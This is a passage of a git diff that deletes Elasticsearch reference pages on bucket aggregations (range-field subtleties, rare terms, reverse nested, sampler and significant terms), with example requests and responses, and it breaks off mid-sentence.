- "aggregations": { - "price_ranges": { - "buckets": [ - { - "key": "*-100.0", - "to": 100.0, - "doc_count": 2, - "price_stats": { - "count": 2, - "min": 10.0, - "max": 50.0, - "avg": 30.0, - "sum": 60.0 - } - }, - { - "key": "100.0-200.0", - "from": 100.0, - "to": 200.0, - "doc_count": 2, - "price_stats": { - "count": 2, - "min": 150.0, - "max": 175.0, - "avg": 162.5, - "sum": 325.0 - } - }, - { - "key": "200.0-*", - "from": 200.0, - "doc_count": 3, - "price_stats": { - "count": 3, - "min": 200.0, - "max": 200.0, - "avg": 200.0, - "sum": 600.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] diff --git a/docs/reference/aggregations/bucket/range-field-note.asciidoc b/docs/reference/aggregations/bucket/range-field-note.asciidoc deleted file mode 100644 index 78841760f6a..00000000000 --- a/docs/reference/aggregations/bucket/range-field-note.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[search-aggregations-bucket-range-field-note]] -=== Subtleties of bucketing range fields - -==== Documents are counted for each bucket they land in - -Since a range represents multiple values, running a bucket aggregation over a -range field can result in the same document landing in multiple buckets. This -can lead to surprising behavior, such as the sum of bucket counts being higher -than the number of matched documents. For example, consider the following -index: -[source, console] --------------------------------------------------- -PUT range_index -{ - "settings": { - "number_of_shards": 2 - }, - "mappings": { - "properties": { - "expected_attendees": { - "type": "integer_range" - }, - "time_frame": { - "type": "date_range", - "format": "yyyy-MM-dd||epoch_millis" - } - } - } -} - -PUT range_index/_doc/1?refresh -{ - "expected_attendees" : { - "gte" : 10, - "lte" : 20 - }, - "time_frame" : { - "gte" : "2019-10-28", - "lte" : "2019-11-04" - } -} --------------------------------------------------- -// TESTSETUP - -The range is wider than the interval in the following aggregation, and thus the -document will land in multiple buckets. - -[source, console] --------------------------------------------------- -POST /range_index/_search?size=0 -{ - "aggs": { - "range_histo": { - "histogram": { - "field": "expected_attendees", - "interval": 5 - } - } - } -} --------------------------------------------------- - -Since the interval is `5` (and the offset is `0` by default), we expect buckets `10`, -`15`, and `20`. Our range document will fall in all three of these buckets. - -[source, console-result] --------------------------------------------------- -{ - ... - "aggregations" : { - "range_histo" : { - "buckets" : [ - { - "key" : 10.0, - "doc_count" : 1 - }, - { - "key" : 15.0, - "doc_count" : 1 - }, - { - "key" : 20.0, - "doc_count" : 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -A document cannot exist partially in a bucket; For example, the above document -cannot count as one-third in each of the above three buckets. In this example, -since the document's range landed in multiple buckets, the full value of that -document would also be counted in any sub-aggregations for each bucket as well. - -==== Query bounds are not aggregation filters - -Another unexpected behavior can arise when a query is used to filter on the -field being aggregated. 
In this case, a document could match the query but -still have one or both of the endpoints of the range outside the query. -Consider the following aggregation on the above document: - -[source, console] --------------------------------------------------- -POST /range_index/_search?size=0 -{ - "query": { - "range": { - "time_frame": { - "gte": "2019-11-01", - "format": "yyyy-MM-dd" - } - } - }, - "aggs": { - "november_data": { - "date_histogram": { - "field": "time_frame", - "calendar_interval": "day", - "format": "yyyy-MM-dd" - } - } - } -} --------------------------------------------------- - -Even though the query only considers days in November, the aggregation -generates 8 buckets (4 in October, 4 in November) because the aggregation is -calculated over the ranges of all matching documents. - -[source, console-result] --------------------------------------------------- -{ - ... - "aggregations" : { - "november_data" : { - "buckets" : [ - { - "key_as_string" : "2019-10-28", - "key" : 1572220800000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-10-29", - "key" : 1572307200000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-10-30", - "key" : 1572393600000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-10-31", - "key" : 1572480000000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-11-01", - "key" : 1572566400000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-11-02", - "key" : 1572652800000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-11-03", - "key" : 1572739200000, - "doc_count" : 1 - }, - { - "key_as_string" : "2019-11-04", - "key" : 1572825600000, - "doc_count" : 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -Depending on the use case, a `CONTAINS` query could limit the documents to only -those that fall entirely in the queried range. In this example, the one -document would not be included and the aggregation would be empty. Filtering -the buckets after the aggregation is also an option, for use cases where the -document should be counted but the out of bounds data can be safely ignored. diff --git a/docs/reference/aggregations/bucket/rare-terms-aggregation.asciidoc b/docs/reference/aggregations/bucket/rare-terms-aggregation.asciidoc deleted file mode 100644 index ae224e4fac2..00000000000 --- a/docs/reference/aggregations/bucket/rare-terms-aggregation.asciidoc +++ /dev/null @@ -1,355 +0,0 @@ -[[search-aggregations-bucket-rare-terms-aggregation]] -=== Rare terms aggregation -++++ -Rare terms -++++ - -A multi-bucket value source based aggregation which finds "rare" terms -- terms that are at the long-tail -of the distribution and are not frequent. Conceptually, this is like a `terms` aggregation that is -sorted by `_count` ascending. As noted in the <>, -actually ordering a `terms` agg by count ascending has unbounded error. 
Instead, you should use the `rare_terms` -aggregation - -////////////////////////// - -[source,js] --------------------------------------------------- -PUT /products -{ - "mappings": { - "properties": { - "genre": { - "type": "keyword" - }, - "product": { - "type": "keyword" - } - } - } -} - -POST /products/_doc/_bulk?refresh -{"index":{"_id":0}} -{"genre": "rock", "product": "Product A"} -{"index":{"_id":1}} -{"genre": "rock"} -{"index":{"_id":2}} -{"genre": "rock"} -{"index":{"_id":3}} -{"genre": "jazz", "product": "Product Z"} -{"index":{"_id":4}} -{"genre": "jazz"} -{"index":{"_id":5}} -{"genre": "electronic"} -{"index":{"_id":6}} -{"genre": "electronic"} -{"index":{"_id":7}} -{"genre": "electronic"} -{"index":{"_id":8}} -{"genre": "electronic"} -{"index":{"_id":9}} -{"genre": "electronic"} -{"index":{"_id":10}} -{"genre": "swing"} - -------------------------------------------------- -// NOTCONSOLE -// TESTSETUP - -////////////////////////// - -==== Syntax - -A `rare_terms` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "rare_terms": { - "field": "the_field", - "max_doc_count": 1 - } -} --------------------------------------------------- -// NOTCONSOLE - -.`rare_terms` Parameters -|=== -|Parameter Name |Description |Required |Default Value -|`field` |The field we wish to find rare terms in |Required | -|`max_doc_count` |The maximum number of documents a term should appear in. |Optional |`1` -|`precision` |The precision of the internal CuckooFilters. Smaller precision leads to -better approximation, but higher memory usage. Cannot be smaller than `0.00001` |Optional |`0.01` -|`include` |Terms that should be included in the aggregation|Optional | -|`exclude` |Terms that should be excluded from the aggregation|Optional | -|`missing` |The value that should be used if a document does not have the field being aggregated|Optional | -|=== - - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre" - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "genres": { - "buckets": [ - { - "key": "swing", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -In this example, the only bucket that we see is the "swing" bucket, because it is the only term that appears in -one document. If we increase the `max_doc_count` to `2`, we'll see some more buckets: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre", - "max_doc_count": 2 - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -This now shows the "jazz" term which has a `doc_count` of 2": - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "genres": { - "buckets": [ - { - "key": "swing", - "doc_count": 1 - }, - { - "key": "jazz", - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -[[search-aggregations-bucket-rare-terms-aggregation-max-doc-count]] -==== Maximum document count - -The `max_doc_count` parameter is used to control the upper bound of document counts that a term can have. There -is not a size limitation on the `rare_terms` agg like `terms` agg has. This means that terms -which match the `max_doc_count` criteria will be returned. The aggregation functions in this manner to avoid -the order-by-ascending issues that afflict the `terms` aggregation. - -This does, however, mean that a large number of results can be returned if chosen incorrectly. -To limit the danger of this setting, the maximum `max_doc_count` is 100. - -[[search-aggregations-bucket-rare-terms-aggregation-max-buckets]] -==== Max Bucket Limit - -The Rare Terms aggregation is more liable to trip the `search.max_buckets` soft limit than other aggregations due -to how it works. The `max_bucket` soft-limit is evaluated on a per-shard basis while the aggregation is collecting -results. It is possible for a term to be "rare" on a shard but become "not rare" once all the shard results are -merged together. This means that individual shards tend to collect more buckets than are truly rare, because -they only have their own local view. This list is ultimately pruned to the correct, smaller list of rare -terms on the coordinating node... but a shard may have already tripped the `max_buckets` soft limit and aborted -the request. - -When aggregating on fields that have potentially many "rare" terms, you may need to increase the `max_buckets` soft -limit. Alternatively, you might need to find a way to filter the results to return fewer rare values (smaller time -span, filter by category, etc), or re-evaluate your definition of "rare" (e.g. if something -appears 100,000 times, is it truly "rare"?) - -[[search-aggregations-bucket-rare-terms-aggregation-approximate-counts]] -==== Document counts are approximate - -The naive way to determine the "rare" terms in a dataset is to place all the values in a map, incrementing counts -as each document is visited, then return the bottom `n` rows. This does not scale beyond even modestly sized data -sets. A sharded approach where only the "top n" values are retained from each shard (ala the `terms` aggregation) -fails because the long-tail nature of the problem means it is impossible to find the "top n" bottom values without -simply collecting all the values from all shards. - -Instead, the Rare Terms aggregation uses a different approximate algorithm: - -1. Values are placed in a map the first time they are seen. -2. Each addition occurrence of the term increments a counter in the map -3. If the counter > the `max_doc_count` threshold, the term is removed from the map and placed in a -https://www.cs.cmu.edu/~dga/papers/cuckoo-conext2014.pdf[CuckooFilter] -4. The CuckooFilter is consulted on each term. If the value is inside the filter, it is known to be above the -threshold already and skipped. - -After execution, the map of values is the map of "rare" terms under the `max_doc_count` threshold. This map and CuckooFilter -are then merged with all other shards. If there are terms that are greater than the threshold (or appear in -a different shard's CuckooFilter) the term is removed from the merged list. 
The final map of values is returned -to the user as the "rare" terms. - -CuckooFilters have the possibility of returning false positives (they can say a value exists in their collection when -it actually does not). Since the CuckooFilter is being used to see if a term is over threshold, this means a false positive -from the CuckooFilter will mistakenly say a value is common when it is not (and thus exclude it from it final list of buckets). -Practically, this means the aggregations exhibits false-negative behavior since the filter is being used "in reverse" -of how people generally think of approximate set membership sketches. - -CuckooFilters are described in more detail in the paper: - -https://www.cs.cmu.edu/~dga/papers/cuckoo-conext2014.pdf[Fan, Bin, et al. "Cuckoo filter: Practically better than bloom."] -Proceedings of the 10th ACM International on Conference on emerging Networking Experiments and Technologies. ACM, 2014. - -==== Precision - -Although the internal CuckooFilter is approximate in nature, the false-negative rate can be controlled with a -`precision` parameter. This allows the user to trade more runtime memory for more accurate results. - -The default precision is `0.001`, and the smallest (e.g. most accurate and largest memory overhead) is `0.00001`. -Below are some charts which demonstrate how the accuracy of the aggregation is affected by precision and number -of distinct terms. - -The X-axis shows the number of distinct values the aggregation has seen, and the Y-axis shows the percent error. -Each line series represents one "rarity" condition (ranging from one rare item to 100,000 rare items). For example, -the orange "10" line means ten of the values were "rare" (`doc_count == 1`), out of 1-20m distinct values (where the -rest of the values had `doc_count > 1`) - -This first chart shows precision `0.01`: - -image:images/rare_terms/accuracy_01.png[] - -And precision `0.001` (the default): - -image:images/rare_terms/accuracy_001.png[] - -And finally `precision 0.0001`: - -image:images/rare_terms/accuracy_0001.png[] - -The default precision of `0.001` maintains an accuracy of < 2.5% for the tested conditions, and accuracy slowly -degrades in a controlled, linear fashion as the number of distinct values increases. - -The default precision of `0.001` has a memory profile of `1.748⁻⁶ * n` bytes, where `n` is the number -of distinct values the aggregation has seen (it can also be roughly eyeballed, e.g. 20 million unique values is about -30mb of memory). The memory usage is linear to the number of distinct values regardless of which precision is chosen, -the precision only affects the slope of the memory profile as seen in this chart: - -image:images/rare_terms/memory.png[] - -For comparison, an equivalent terms aggregation at 20 million buckets would be roughly -`20m * 69b == ~1.38gb` (with 69 bytes being a very optimistic estimate of an empty bucket cost, far lower than what -the circuit breaker accounts for). So although the `rare_terms` agg is relatively heavy, it is still orders of -magnitude smaller than the equivalent terms aggregation - -==== Filtering Values - -It is possible to filter the values for which buckets will be created. This can be done using the `include` and -`exclude` parameters which are based on regular expression strings or arrays of exact values. Additionally, -`include` clauses can filter using `partition` expressions. 
- -===== Filtering Values with regular expressions - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre", - "include": "swi*", - "exclude": "electro*" - } - } - } -} --------------------------------------------------- - -In the above example, buckets will be created for all the tags that starts with `swi`, except those starting -with `electro` (so the tag `swing` will be aggregated but not `electro_swing`). The `include` regular expression will determine what -values are "allowed" to be aggregated, while the `exclude` determines the values that should not be aggregated. When -both are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`. - -The syntax is the same as <>. - -===== Filtering Values with exact values - -For matching based on exact values the `include` and `exclude` parameters can simply take an array of -strings that represent the terms as they are found in the index: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre", - "include": [ "swing", "rock" ], - "exclude": [ "jazz" ] - } - } - } -} --------------------------------------------------- - - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "rare_terms": { - "field": "genre", - "missing": "N/A" <1> - } - } - } -} --------------------------------------------------- - -<1> Documents without a value in the `tags` field will fall into the same bucket as documents that have the value `N/A`. - -==== Nested, RareTerms, and scoring sub-aggregations - -The RareTerms aggregation has to operate in `breadth_first` mode, since it needs to prune terms as doc count thresholds -are breached. This requirement means the RareTerms aggregation is incompatible with certain combinations of aggregations -that require `depth_first`. In particular, scoring sub-aggregations that are inside a `nested` force the entire aggregation tree to run -in `depth_first` mode. This will throw an exception since RareTerms is unable to process `depth_first`. - -As a concrete example, if `rare_terms` aggregation is the child of a `nested` aggregation, and one of the child aggregations of `rare_terms` -needs document scores (like a `top_hits` aggregation), this will throw an exception. \ No newline at end of file diff --git a/docs/reference/aggregations/bucket/reverse-nested-aggregation.asciidoc b/docs/reference/aggregations/bucket/reverse-nested-aggregation.asciidoc deleted file mode 100644 index da0026ab14b..00000000000 --- a/docs/reference/aggregations/bucket/reverse-nested-aggregation.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[search-aggregations-bucket-reverse-nested-aggregation]] -=== Reverse nested aggregation -++++ -Reverse nested -++++ - -A special single bucket aggregation that enables aggregating on parent docs from nested documents. Effectively this -aggregation can break out of the nested block structure and link to other nested structures or the root document, -which allows nesting other aggregations that aren't part of the nested object in a nested aggregation. 
- -The `reverse_nested` aggregation must be defined inside a `nested` aggregation. - -.Options: -* `path` - Which defines to what nested object field should be joined back. The default is empty, -which means that it joins back to the root / main document level. The path cannot contain a reference to -a nested object field that falls outside the `nested` aggregation's nested structure a `reverse_nested` is in. - -For example, lets say we have an index for a ticket system with issues and comments. The comments are inlined into -the issue documents as nested documents. The mapping could look like: - -[source,console] --------------------------------------------------- -PUT /issues -{ - "mappings": { - "properties": { - "tags": { "type": "keyword" }, - "comments": { <1> - "type": "nested", - "properties": { - "username": { "type": "keyword" }, - "comment": { "type": "text" } - } - } - } - } -} --------------------------------------------------- - -<1> The `comments` is an array that holds nested documents under the `issue` object. - -The following aggregations will return the top commenters' username that have commented and per top commenter the top -tags of the issues the user has commented on: - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /issues/_doc/0?refresh -{"tags": ["tag_1"], "comments": [{"username": "username_1"}]} --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /issues/_search -{ - "query": { - "match_all": {} - }, - "aggs": { - "comments": { - "nested": { - "path": "comments" - }, - "aggs": { - "top_usernames": { - "terms": { - "field": "comments.username" - }, - "aggs": { - "comment_to_issue": { - "reverse_nested": {}, <1> - "aggs": { - "top_tags_per_comment": { - "terms": { - "field": "tags" - } - } - } - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[s/_search/_search\?filter_path=aggregations/] - -As you can see above, the `reverse_nested` aggregation is put in to a `nested` aggregation as this is the only place -in the dsl where the `reverse_nested` aggregation can be used. Its sole purpose is to join back to a parent doc higher -up in the nested structure. - -<1> A `reverse_nested` aggregation that joins back to the root / main document level, because no `path` has been defined. -Via the `path` option the `reverse_nested` aggregation can join back to a different level, if multiple layered nested -object types have been defined in the mapping - -Possible response snippet: - -[source,console-result] --------------------------------------------------- -{ - "aggregations": { - "comments": { - "doc_count": 1, - "top_usernames": { - "doc_count_error_upper_bound" : 0, - "sum_other_doc_count" : 0, - "buckets": [ - { - "key": "username_1", - "doc_count": 1, - "comment_to_issue": { - "doc_count": 1, - "top_tags_per_comment": { - "doc_count_error_upper_bound" : 0, - "sum_other_doc_count" : 0, - "buckets": [ - { - "key": "tag_1", - "doc_count": 1 - } - ... - ] - } - } - } - ... 
- ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] diff --git a/docs/reference/aggregations/bucket/sampler-aggregation.asciidoc b/docs/reference/aggregations/bucket/sampler-aggregation.asciidoc deleted file mode 100644 index afbdd82f195..00000000000 --- a/docs/reference/aggregations/bucket/sampler-aggregation.asciidoc +++ /dev/null @@ -1,163 +0,0 @@ -[[search-aggregations-bucket-sampler-aggregation]] -=== Sampler aggregation -++++ -Sampler -++++ - -A filtering aggregation used to limit any sub aggregations' processing to a sample of the top-scoring documents. - -.Example use cases: -* Tightening the focus of analytics to high-relevance matches rather than the potentially very long tail of low-quality matches -* Reducing the running cost of aggregations that can produce useful results using only samples e.g. `significant_terms` - - -Example: - -A query on StackOverflow data for the popular term `javascript` OR the rarer term -`kibana` will match many documents - most of them missing the word Kibana. To focus -the `significant_terms` aggregation on top-scoring documents that are more likely to match -the most interesting parts of our query we use a sample. - -[source,console] --------------------------------------------------- -POST /stackoverflow/_search?size=0 -{ - "query": { - "query_string": { - "query": "tags:kibana OR tags:javascript" - } - }, - "aggs": { - "sample": { - "sampler": { - "shard_size": 200 - }, - "aggs": { - "keywords": { - "significant_terms": { - "field": "tags", - "exclude": [ "kibana", "javascript" ] - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:stackoverflow] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "sample": { - "doc_count": 200, <1> - "keywords": { - "doc_count": 200, - "bg_count": 650, - "buckets": [ - { - "key": "elasticsearch", - "doc_count": 150, - "score": 1.078125, - "bg_count": 200 - }, - { - "key": "logstash", - "doc_count": 50, - "score": 0.5625, - "bg_count": 50 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -<1> 200 documents were sampled in total. The cost of performing the nested significant_terms aggregation was -therefore limited rather than unbounded. - - -Without the `sampler` aggregation the request query considers the full "long tail" of low-quality matches and therefore identifies -less significant terms such as `jquery` and `angular` rather than focusing on the more insightful Kibana-related terms. - - -[source,console] --------------------------------------------------- -POST /stackoverflow/_search?size=0 -{ - "query": { - "query_string": { - "query": "tags:kibana OR tags:javascript" - } - }, - "aggs": { - "low_quality_keywords": { - "significant_terms": { - "field": "tags", - "size": 3, - "exclude": [ "kibana", "javascript" ] - } - } - } -} --------------------------------------------------- -// TEST[setup:stackoverflow] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "low_quality_keywords": { - "doc_count": 600, - "bg_count": 650, - "buckets": [ - { - "key": "angular", - "doc_count": 200, - "score": 0.02777, - "bg_count": 200 - }, - { - "key": "jquery", - "doc_count": 200, - "score": 0.02777, - "bg_count": 200 - }, - { - "key": "logstash", - "doc_count": 50, - "score": 0.0069, - "bg_count": 50 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/0.02777/$body.aggregations.low_quality_keywords.buckets.0.score/] -// TESTRESPONSE[s/0.0069/$body.aggregations.low_quality_keywords.buckets.2.score/] - - - -==== shard_size - -The `shard_size` parameter limits how many top-scoring documents are collected in the sample processed on each shard. -The default value is 100. - -==== Limitations - -[[sampler-breadth-first-nested-agg]] -===== Cannot be nested under `breadth_first` aggregations -Being a quality-based filter the sampler aggregation needs access to the relevance score produced for each document. -It therefore cannot be nested under a `terms` aggregation which has the `collect_mode` switched from the default `depth_first` mode to `breadth_first` as this discards scores. -In this situation an error will be thrown. \ No newline at end of file diff --git a/docs/reference/aggregations/bucket/significantterms-aggregation.asciidoc b/docs/reference/aggregations/bucket/significantterms-aggregation.asciidoc deleted file mode 100644 index 6bd36945eae..00000000000 --- a/docs/reference/aggregations/bucket/significantterms-aggregation.asciidoc +++ /dev/null @@ -1,585 +0,0 @@ -[[search-aggregations-bucket-significantterms-aggregation]] -=== Significant terms aggregation -++++ -Significant terms -++++ - -An aggregation that returns interesting or unusual occurrences of terms in a set. - -.Example use cases: -* Suggesting "H5N1" when users search for "bird flu" in text -* Identifying the merchant that is the "common point of compromise" from the transaction history of credit card owners reporting loss -* Suggesting keywords relating to stock symbol $ATI for an automated news classifier -* Spotting the fraudulent doctor who is diagnosing more than their fair share of whiplash injuries -* Spotting the tire manufacturer who has a disproportionate number of blow-outs - -In all these cases the terms being selected are not simply the most popular terms in a set. -They are the terms that have undergone a significant change in popularity measured between a _foreground_ and _background_ set. -If the term "H5N1" only exists in 5 documents in a 10 million document index and yet is found in 4 of the 100 documents that make up a user's search results -that is significant and probably very relevant to their search. 5/10,000,000 vs 4/100 is a big swing in frequency. 
- -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /reports -{ - "mappings": { - "properties": { - "force": { - "type": "keyword" - }, - "crime_type": { - "type": "keyword" - } - } - } -} - -POST /reports/_bulk?refresh -{"index":{"_id":0}} -{"force": "British Transport Police", "crime_type": "Bicycle theft"} -{"index":{"_id":1}} -{"force": "British Transport Police", "crime_type": "Bicycle theft"} -{"index":{"_id":2}} -{"force": "British Transport Police", "crime_type": "Bicycle theft"} -{"index":{"_id":3}} -{"force": "British Transport Police", "crime_type": "Robbery"} -{"index":{"_id":4}} -{"force": "Metropolitan Police Service", "crime_type": "Robbery"} -{"index":{"_id":5}} -{"force": "Metropolitan Police Service", "crime_type": "Bicycle theft"} -{"index":{"_id":6}} -{"force": "Metropolitan Police Service", "crime_type": "Robbery"} -{"index":{"_id":7}} -{"force": "Metropolitan Police Service", "crime_type": "Robbery"} - -------------------------------------------------- -// TESTSETUP - -////////////////////////// - -==== Single-set analysis - -In the simplest case, the _foreground_ set of interest is the search results matched by a query and the _background_ -set used for statistical comparisons is the index or indices from which the results were gathered. - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "terms": { "force": [ "British Transport Police" ] } - }, - "aggregations": { - "significant_crime_types": { - "significant_terms": { "field": "crime_type" } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "significant_crime_types": { - "doc_count": 47347, - "bg_count": 5064554, - "buckets": [ - { - "key": "Bicycle theft", - "doc_count": 3640, - "score": 0.371235374214817, - "bg_count": 66799 - } - ... - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/: (0\.)?[0-9]+/: $body.$_path/] - -When querying an index of all crimes from all police forces, what these results show is that the British Transport Police force -stand out as a force dealing with a disproportionately large number of bicycle thefts. Ordinarily, bicycle thefts represent only 1% of crimes (66799/5064554) -but for the British Transport Police, who handle crime on railways and stations, 7% of crimes (3640/47347) is -a bike theft. This is a significant seven-fold increase in frequency and so this anomaly was highlighted as the top crime type. - -The problem with using a query to spot anomalies is it only gives us one subset to use for comparisons. -To discover all the other police forces' anomalies we would have to repeat the query for each of the different forces. - -This can be a tedious way to look for unusual patterns in an index - - - -==== Multi-set analysis -A simpler way to perform analysis across multiple categories is to use a parent-level aggregation to segment the data ready for analysis. 
- - -Example using a parent aggregation for segmentation: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggregations": { - "forces": { - "terms": { "field": "force" }, - "aggregations": { - "significant_crime_types": { - "significant_terms": { "field": "crime_type" } - } - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "forces": { - "doc_count_error_upper_bound": 1375, - "sum_other_doc_count": 7879845, - "buckets": [ - { - "key": "Metropolitan Police Service", - "doc_count": 894038, - "significant_crime_types": { - "doc_count": 894038, - "bg_count": 5064554, - "buckets": [ - { - "key": "Robbery", - "doc_count": 27617, - "score": 0.0599, - "bg_count": 53182 - } - ... - ] - } - }, - { - "key": "British Transport Police", - "doc_count": 47347, - "significant_crime_types": { - "doc_count": 47347, - "bg_count": 5064554, - "buckets": [ - { - "key": "Bicycle theft", - "doc_count": 3640, - "score": 0.371, - "bg_count": 66799 - } - ... - ] - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/: (0\.)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] - -Now we have anomaly detection for each of the police forces using a single request. - -We can use other forms of top-level aggregations to segment our data, for example segmenting by geographic -area to identify unusual hot-spots of a particular crime type: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "hotspots": { - "geohash_grid": { - "field": "location", - "precision": 5 - }, - "aggs": { - "significant_crime_types": { - "significant_terms": { "field": "crime_type" } - } - } - } - } -} --------------------------------------------------- - -This example uses the `geohash_grid` aggregation to create result buckets that represent geographic areas, and inside each -bucket we can identify anomalous levels of a crime type in these tightly-focused areas e.g. - -* Airports exhibit unusual numbers of weapon confiscations -* Universities show uplifts of bicycle thefts - -At a higher geohash_grid zoom-level with larger coverage areas we would start to see where an entire police-force may be -tackling an unusual volume of a particular crime type. - - -Obviously a time-based top-level segmentation would help identify current trends for each point in time -where a simple `terms` aggregation would typically show the very popular "constants" that persist across all time slots. - - - -.How are the scores calculated? -********************************** -The numbers returned for scores are primarily intended for ranking different suggestions sensibly rather than something easily understood by end users. The scores are derived from the doc frequencies in _foreground_ and _background_ sets. In brief, a term is considered significant if there is a noticeable difference in the frequency in which a term appears in the subset and in the background. The way the terms are ranked can be configured, see "Parameters" section. 
- -********************************** - - -==== Use on free-text fields - -The significant_terms aggregation can be used effectively on tokenized free-text fields to suggest: - -* keywords for refining end-user searches -* keywords for use in percolator queries - -WARNING: Picking a free-text field as the subject of a significant terms analysis can be expensive! It will attempt -to load every unique word into RAM. It is recommended to only use this on smaller indices. - -.Use the _"like this but not this"_ pattern -********************************** -You can spot mis-categorized content by first searching a structured field e.g. `category:adultMovie` and use significant_terms on the -free-text "movie_description" field. Take the suggested words (I'll leave them to your imagination) and then search for all movies NOT marked as category:adultMovie but containing these keywords. -You now have a ranked list of badly-categorized movies that you should reclassify or at least remove from the "familyFriendly" category. - -The significance score from each term can also provide a useful `boost` setting to sort matches. -Using the `minimum_should_match` setting of the `terms` query with the keywords will help control the balance of precision/recall in the result set i.e -a high setting would have a small number of relevant results packed full of keywords and a setting of "1" would produce a more exhaustive results set with all documents containing _any_ keyword. - -********************************** - -[TIP] -============ -.Show significant_terms in context - -Free-text significant_terms are much more easily understood when viewed in context. Take the results of `significant_terms` suggestions from a -free-text field and use them in a `terms` query on the same field with a `highlight` clause to present users with example snippets of documents. When the terms -are presented unstemmed, highlighted, with the right case, in the right order and with some context, their significance/meaning is more readily apparent. -============ - -==== Custom background sets - -Ordinarily, the foreground set of documents is "diffed" against a background set of all the documents in your index. -However, sometimes it may prove useful to use a narrower background set as the basis for comparisons. -For example, a query on documents relating to "Madrid" in an index with content from all over the world might reveal that "Spanish" -was a significant term. This may be true but if you want some more focused terms you could use a `background_filter` -on the term 'spain' to establish a narrower set of documents as context. With this as a background "Spanish" would now -be seen as commonplace and therefore not as significant as words like "capital" that relate more strongly with Madrid. -Note that using a background filter will slow things down - each term's background frequency must now be derived on-the-fly from filtering posting lists rather than reading the index's pre-computed count for a term. - -==== Limitations - -===== Significant terms must be indexed values -Unlike the terms aggregation it is currently not possible to use script-generated terms for counting purposes. -Because of the way the significant_terms aggregation must consider both _foreground_ and _background_ frequencies -it would be prohibitively expensive to use a script on the entire index to obtain background frequencies for comparisons. -Also DocValues are not supported as sources of term data for similar reasons. 
- -===== No analysis of floating point fields -Floating point fields are currently not supported as the subject of significant_terms analysis. -While integer or long fields can be used to represent concepts like bank account numbers or category numbers which -can be interesting to track, floating point fields are usually used to represent quantities of something. -As such, individual floating point terms are not useful for this form of frequency analysis. - -===== Use as a parent aggregation -If there is the equivalent of a `match_all` query or no query criteria providing a subset of the index the significant_terms aggregation should not be used as the -top-most aggregation - in this scenario the _foreground_ set is exactly the same as the _background_ set and -so there is no difference in document frequencies to observe and from which to make sensible suggestions. - -Another consideration is that the significant_terms aggregation produces many candidate results at shard level -that are only later pruned on the reducing node once all statistics from all shards are merged. As a result, -it can be inefficient and costly in terms of RAM to embed large child aggregations under a significant_terms -aggregation that later discards many candidate terms. It is advisable in these cases to perform two searches - the first to provide a rationalized list of -significant_terms and then add this shortlist of terms to a second query to go back and fetch the required child aggregations. - -===== Approximate counts -The counts of how many documents contain a term provided in results are based on summing the samples returned from each shard and -as such may be: - -* low if certain shards did not provide figures for a given term in their top sample -* high when considering 